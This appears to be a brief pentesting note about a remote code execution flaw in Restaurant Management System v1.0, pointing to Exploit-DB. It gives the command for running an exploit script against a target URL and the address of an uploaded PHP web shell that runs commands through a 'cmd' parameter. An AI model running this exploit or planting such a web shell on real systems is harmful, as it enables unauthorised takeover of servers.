Restaurant Management System (RMS) Pentesting

Remote Code Execution (RCE) v1.0

See the Exploit-DB for details.

python3 rms-rce.py https://example.com/rms/

When uploading successfully, we can access to https://example.com/rms/images/reverse-shell.php?cmd=id